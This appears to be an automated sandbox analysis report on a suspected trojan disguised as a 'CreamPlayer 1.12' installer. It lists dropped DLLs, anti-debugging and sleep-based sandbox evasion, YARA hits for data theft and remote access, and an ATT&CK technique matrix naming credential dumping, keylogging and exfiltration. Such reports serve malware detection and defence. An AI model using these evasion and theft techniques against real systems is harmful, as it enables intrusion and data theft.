                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\CreamPlayer 1.12\gdiplus.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\CreamPlayer 1.12\is-FFG28.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\CreamPlayer 1.12\ltkrn13n.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\CreamPlayer 1.12\is-U5LDH.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\CreamPlayer 1.12\is-5889C.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\CreamPlayer 1.12\uninstall\unins000.exe (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\CreamPlayer 1.12\is-AG5KU.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\CreamPlayer 1.12\LTDIS13n.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\CreamPlayer 1.12\is-S3M63.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-DCP4R.tmp\_isetup\_setup64.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\CreamPlayer 1.12\is-7JNKK.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-DCP4R.tmp\_isetup\_iscrypt.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-DCP4R.tmp\_isetup\_shfoldr.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\CreamPlayer 1.12\is-2031L.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\CreamPlayer 1.12\msvcr71.dll (copy)Jump to dropped file
                    Source: C:\Users\user\Desktop\bzX2pV3Ybw.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-5969
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeAPI coverage: 4.8 %
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe TID: 7424Thread sleep count: 3773 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe TID: 7424Thread sleep time: -7546000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe TID: 7772Thread sleep time: -1140000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe TID: 7424Thread sleep count: 6154 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe TID: 7424Thread sleep time: -12308000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeFile opened: PhysicalDrive0Jump to behavior
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_00452A60 FindFirstFileA,GetLastError,2_2_00452A60
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_00474F88 FindFirstFileA,FindNextFileA,FindClose,2_2_00474F88
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_004980A4 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,2_2_004980A4
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_00464158 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,2_2_00464158
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_00462750 FindFirstFileA,FindNextFileA,FindClose,2_2_00462750
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_00463CDC SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,2_2_00463CDC
                    Source: C:\Users\user\Desktop\bzX2pV3Ybw.exeCode function: 0_2_00409B78 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,0_2_00409B78
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeThread delayed: delay time: 60000Jump to behavior
                    Source: creamplayer_x32.exe, 00000005.00000002.2617153397.00000000034D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWd~
                    Source: creamplayer_x32.exe, 00000005.00000002.2617153397.00000000034D0000.00000004.00000020.00020000.00000000.sdmp, creamplayer_x32.exe, 00000005.00000002.2614997353.0000000000958000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: C:\Users\user\Desktop\bzX2pV3Ybw.exeAPI call chain: ExitProcess graph end nodegraph_0-6766
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeAPI call chain: ExitProcess graph end nodegraph_5-61087
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleepgraph_5-61268
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_02D580F0 IsDebuggerPresent,5_2_02D580F0
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_02D5E6AE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,5_2_02D5E6AE
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_004502C0 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_004502C0
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_02D45E4F RtlInitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetTickCount,GetVersionExA,_memset,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,_memset,_memset,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_malloc,_malloc,_malloc,QueryPerformanceCounter,Sleep,_malloc,_malloc,_memset,_memset,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,5_2_02D45E4F
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_02D580DA SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_02D580DA
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_00478504 ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,2_2_00478504
                    Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 pause cream_player_12135Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_0042E09C AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,2_2_0042E09C
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_02D4E850 cpuid 5_2_02D4E850
                    Source: C:\Users\user\Desktop\bzX2pV3Ybw.exeCode function: GetLocaleInfoA,0_2_0040520C
                    Source: C:\Users\user\Desktop\bzX2pV3Ybw.exeCode function: GetLocaleInfoA,0_2_00405258
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: GetLocaleInfoA,2_2_00408568
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: GetLocaleInfoA,2_2_004085B4
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_004585C8 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle,2_2_004585C8
                    Source: C:\Users\user\Desktop\bzX2pV3Ybw.exeCode function: 0_2_004026C4 GetSystemTime,0_2_004026C4
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_0045559C GetUserNameA,2_2_0045559C
                    Source: C:\Users\user\Desktop\bzX2pV3Ybw.exeCode function: 0_2_00405CF4 GetVersionExA,0_2_00405CF4

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 00000005.00000002.2616558941.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2616261521.0000000002CA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: creamplayer_x32.exe PID: 7420, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 00000005.00000002.2616558941.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2616261521.0000000002CA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: creamplayer_x32.exe PID: 7420, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_609660FA sqlite3_finalize,sqlite3_free,sqlite3_value_numeric_type,sqlite3_value_numeric_type,sqlite3_value_text,sqlite3_value_int,memcmp,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_strnicmp,sqlite3_mprintf,sqlite3_mprintf,sqlite3_malloc,sqlite3_free,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_bind_value,5_2_609660FA
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_6090C1D6 sqlite3_clear_bindings,sqlite3_mutex_enter,sqlite3_mutex_leave,5_2_6090C1D6
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_60963143 sqlite3_stricmp,sqlite3_bind_int64,sqlite3_mutex_leave,5_2_60963143
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_6096A2BD sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,5_2_6096A2BD
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_6096923E sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_malloc,sqlite3_malloc,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_realloc,sqlite3_realloc,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_free,5_2_6096923E
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_6096A38C sqlite3_bind_int,sqlite3_column_int,sqlite3_step,sqlite3_reset,5_2_6096A38C
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_6096748C sqlite3_malloc,sqlite3_bind_int,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_reset,sqlite3_bind_int,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_malloc,sqlite3_bind_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_reset,memcmp,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_bind_int64,sqlite3_realloc,sqlite3_column_int,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_bind_int,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,5_2_6096748C
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_609254B1 sqlite3_bind_zeroblob,sqlite3_mutex_leave,5_2_609254B1
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_6094B407 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,5_2_6094B407
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_6090F435 sqlite3_bind_parameter_index,5_2_6090F435
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_609255D4 sqlite3_mutex_leave,sqlite3_bind_text16,5_2_609255D4
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_609255FF sqlite3_bind_text,5_2_609255FF
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_6096A5EE sqlite3_value_text,sqlite3_value_bytes,sqlite3_strnicmp,sqlite3_strnicmp,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_malloc,sqlite3_column_int,sqlite3_column_int64,sqlite3_column_text,sqlite3_column_bytes,sqlite3_finalize,sqlite3_step,sqlite3_free,sqlite3_finalize,sqlite3_strnicmp,sqlite3_bind_int,sqlite3_column_int,sqlite3_step,sqlite3_reset,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_column_int64,sqlite3_column_int,sqlite3_column_text,sqlite3_column_bytes,sqlite3_step,sqlite3_finalize,sqlite3_strnicmp,sqlite3_strnicmp,sqlite3_bind_int,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_value_int,sqlite3_malloc,sqlite3_bind_null,sqlite3_step,sqlite3_reset,sqlite3_value_int,sqlite3_value_text,sqlite3_value_bytes,sqlite3_free,5_2_6096A5EE
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_6094B54C sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,memmove,5_2_6094B54C
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_60925686 sqlite3_bind_int64,sqlite3_mutex_leave,5_2_60925686
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_6094A6C5 sqlite3_bind_int64,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_malloc,sqlite3_reset,sqlite3_free,5_2_6094A6C5
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_609256E5 sqlite3_bind_int,sqlite3_bind_int64,5_2_609256E5
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_6094B6ED sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,5_2_6094B6ED
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_6092562A sqlite3_bind_blob,5_2_6092562A
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_60925655 sqlite3_bind_null,sqlite3_mutex_leave,5_2_60925655
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_6094C64A sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,5_2_6094C64A
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_609687A7 sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_column_int64,sqlite3_reset,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,5_2_609687A7
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_6095F7F7 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,5_2_6095F7F7
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_6092570B sqlite3_bind_double,sqlite3_mutex_leave,5_2_6092570B
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_6095F772 sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,5_2_6095F772
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_60925778 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_blob,5_2_60925778
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_6090577D sqlite3_bind_parameter_name,5_2_6090577D
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_6094B764 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,5_2_6094B764
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_6090576B sqlite3_bind_parameter_count,5_2_6090576B
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_6094A894 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,5_2_6094A894
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_6095F883 sqlite3_bind_int64,sqlite3_bind_int,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,5_2_6095F883
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_6094C8C2 sqlite3_value_int,sqlite3_value_int,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_null,sqlite3_bind_null,sqlite3_step,sqlite3_reset,5_2_6094C8C2
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_6096281E sqlite3_mprintf,sqlite3_vtab_config,sqlite3_malloc,sqlite3_mprintf,sqlite3_mprintf,sqlite3_errmsg,sqlite3_mprintf,sqlite3_free,sqlite3_mprintf,sqlite3_exec,sqlite3_free,sqlite3_prepare_v2,sqlite3_bind_text,sqlite3_step,sqlite3_column_int64,sqlite3_finalize,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_errmsg,sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_mprintf,sqlite3_free,sqlite3_declare_vtab,sqlite3_errmsg,sqlite3_mprintf,sqlite3_free,5_2_6096281E
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_6096583A memcmp,sqlite3_realloc,qsort,sqlite3_malloc,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_step,sqlite3_reset,5_2_6096583A
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_6095F9AD sqlite3_bind_int,sqlite3_step,sqlite3_column_type,sqlite3_reset,5_2_6095F9AD
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_6094A92B sqlite3_bind_int64,sqlite3_bind_null,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,5_2_6094A92B
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_6090EAE5 sqlite3_transfer_bindings,5_2_6090EAE5
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_6095FB98 sqlite3_value_int,sqlite3_bind_int,sqlite3_bind_value,sqlite3_step,sqlite3_reset,5_2_6095FB98
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_6095ECA6 sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_bind_value,5_2_6095ECA6
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_6095FCCE sqlite3_malloc,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,5_2_6095FCCE
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_6095FDAE sqlite3_malloc,sqlite3_bind_int,sqlite3_step,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_bind_int,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,sqlite3_free,5_2_6095FDAE
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_60966DF1 sqlite3_value_text,sqlite3_mprintf,sqlite3_free,strcmp,sqlite3_free,sqlite3_malloc,sqlite3_bind_int64,sqlite3_step,sqlite3_column_type,sqlite3_reset,sqlite3_column_blob,sqlite3_reset,sqlite3_malloc,sqlite3_free,sqlite3_reset,sqlite3_result_error_code,sqlite3_result_blob,5_2_60966DF1
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_60969D75 sqlite3_bind_int,sqlite3_step,sqlite3_column_int,sqlite3_reset,5_2_60969D75
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_6095FFB2 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_result_error_code,5_2_6095FFB2
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                    Native API
                    1
                    DLL Side-Loading
                    1
                    Exploitation for Privilege Escalation
                    1
                    Deobfuscate/Decode Files or Information
                    1
                    Input Capture
                    1
                    System Time Discovery
                    Remote Services1
                    Archive Collected Data
                    2
                    Ingress Tool Transfer
                    Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts2
                    Command and Scripting Interpreter
                    5
                    Windows Service
                    1
                    DLL Side-Loading
                    3
                    Obfuscated Files or Information
                    LSASS Memory1
                    Account Discovery
                    Remote Desktop Protocol1
                    Input Capture
                    21
                    Encrypted Channel
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts2
                    Service Execution
                    1
                    Bootkit
                    1
                    Access Token Manipulation
                    21
                    Software Packing
                    Security Account Manager2
                    File and Directory Discovery
                    SMB/Windows Admin SharesData from Network Shared Drive1
                    Non-Standard Port
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook5
                    Windows Service
                    1
                    DLL Side-Loading
                    NTDS35
                    System Information Discovery
                    Distributed Component Object ModelInput Capture1
                    Non-Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
                    Process Injection
                    1
                    Masquerading
                    LSA Secrets141
                    Security Software Discovery
                    SSHKeylogging12
                    Application Layer Protocol
                    Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts121
                    Virtualization/Sandbox Evasion
                    Cached Domain Credentials1
                    Process Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Access Token Manipulation
                    DCSync121
                    Virtualization/Sandbox Evasion
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                    Process Injection
                    Proc Filesystem11
                    Application Window Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                    Bootkit
                    /etc/passwd and /etc/shadow3
                    System Owner/User Discovery
                    Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                    System Network Configuration Discovery
                    Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    bzX2pV3Ybw.exe21%ReversingLabsWin32.Trojan.Munp
                    SourceDetectionScannerLabelLink
                    C:\ProgramData\SmartImageDrive\SmartImageDrive.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe100%Joe Sandbox ML
                    C:\ProgramData\SmartImageDrive\sqlite3.dll0%ReversingLabs
